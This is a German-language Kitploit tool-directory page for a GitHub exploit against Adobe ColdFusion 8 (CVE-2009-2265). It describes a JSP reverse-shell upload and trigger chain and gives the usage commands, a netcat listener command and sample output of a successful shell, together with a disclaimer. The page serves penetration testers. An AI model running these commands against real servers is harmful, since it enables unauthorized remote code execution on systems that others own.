Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Adobe-ColdFusion-8-RCE-CVE-2009-2265 — Adobe ColdFusion 8 - Remotecodeausführung (RCE) | Kitploit
Tools/GitHubGitHub/0xdtc/adobe-coldfusion-8-rce-cve-2009-2265
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHub0xdtc/adobe-coldfusion-8-rce-cve-2009-2265

Adobe-ColdFusion-8-RCE-CVE-2009-2265

Adobe ColdFusion 8 - Remotecodeausführung (RCE)

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Adobe ColdFusion 8 - Remote-Befehlsausführung (RCE) Exploit

Übersicht

Dieser Exploit zielt auf eine bekannte Schwachstelle in Adobe ColdFusion 8 (CVE-2009-2265) ab. Er ermöglicht die Remote-Befehlsausführung (RCE) durch das Hochladen einer bösartigen JSP-Nutzlast, die eine Reverse-Shell-Verbindung herstellt.


Exploit-Details

  • CVE: CVE-2009-2265
  • Schwachstelle: Unsachgemäße Behandlung von Dateiuploads in Adobe ColdFusion 8.
  • Betroffene Versionen: Adobe ColdFusion 8.
  • Auswirkung: Ermöglicht Angreifern die Ausführung beliebiger Befehle auf dem Server.

Funktionen

  1. Generiert automatisch eine JSP-Nutzlast mittels msfvenom.
  2. Lädt die Nutzlast mittels einer Multipart-POST-Anfrage hoch.
  3. Löst die Nutzlast aus, um eine Reverse Shell herzustellen.
  4. Bereinigt automatisch die lokalen Nutzlastdateien nach der Ausführung.

Verwendung

Um diesen Exploit zu verwenden, benötigen Sie Folgendes:

  • Eine Kali-Linux-Maschine oder eine ähnliche Penetrationstest-Umgebung.
  • Installiertes Netcat zum Lauschen auf dem angegebenen Port.
  • Einen anfälligen Adobe ColdFusion 8 Server.

Befehlssyntax

root@kitploit:~
./CVE-2009-2265 -l <LHOST> -p <LPORT> -r <RHOST> -q <RPORT>

Argumente

  • -l <LHOST>: Lokale Angreifer-IP (z. B. 10.10.16.5).
  • -p <LPORT>: Lokaler Angreifer-Port für die Reverse Shell (z. B. 9001).
  • -r <RHOST>: Remote-Ziel-IP (z. B. 10.10.10.11).
  • -q <RPORT>: Remote-Ziel-Port, auf dem ColdFusion läuft (z. B. 8500).

Beispielverwendung

root@kitploit:~
./CVE-2009-2265 -l 10.10.16.5 -p 9001 -r 10.10.10.11 -q 8500
  1. Starten Sie einen Listener auf Ihrer Angreifer-Maschine:

    root@kitploit:~
    nc -lnvp 9001
    
  2. Führen Sie den Exploit mit den entsprechenden Argumenten aus.

  3. Nach der Ausführung verbindet sich die Nutzlast zurück zu Ihrem Listener.


Funktionsweise

  1. Nutzlast generieren:

    • Das Skript verwendet msfvenom, um eine bösartige JSP-Nutzlast zu generieren.
    • Die Nutzlast initiiert eine Reverse Shell zur angegebenen LHOST und LPORT.
  2. Nutzlast hochladen:

    • Die Nutzlast wird mittels einer POST-Anfrage auf den anfälligen ColdFusion-Server hochgeladen.
  3. Nutzlast auslösen:

    • Die hochgeladene Nutzlast wird durch Senden einer GET-Anfrage an die URL der Datei ausgeführt.
  4. Reverse Shell herstellen:

    • Eine Reverse Shell wird hergestellt, die dem Angreifer Zugriff auf das Zielsystem gewährt.

Anforderungen

  • msfvenom zur Nutzlastgenerierung.
  • curl zum Hochladen und Auslösen der Nutzlast.
  • nc (Netcat) zum Lauschen auf Reverse-Shell-Verbindungen.

Beispielausgabe

root@kitploit:~
[+] Generating JSP reverse shell payload...
[+] Payload saved as 'abcd1234-5678-90ef-ghij-1234567890ab.jsp'.
[+] Uploading the payload to the target...
[+] Server response:
    <script type="text/javascript">
        window.parent.OnUploadCompleted(0, "/userfiles/file/abcd1234-5678-90ef-ghij-1234567890ab.jsp", "abcd1234-5678-90ef-ghij-1234567890ab.txt", "0");
    </script>
[+] Waiting for the Netcat listener to start on port 9001...
[+] Netcat listener detected running on port 9001!
[+] Attempting to trigger the payload...
[+] Payload triggered successfully. Check your listener for the reverse shell.
[+] Cleaning up local files...
[+] Done!

Haftungsausschluss

Dieses Skript dient ausschließlich zu Bildungszwecken. Verwenden Sie es nur auf Systemen, die Ihnen gehören oder für die Sie ausdrückliche Testberechtigung haben. Die unbefugte Nutzung dieses Exploits auf Systemen, die Ihnen nicht gehören, ist illegal und unethisch.


Autor

Entwickelt von [0xDTC].

Tool herunterladen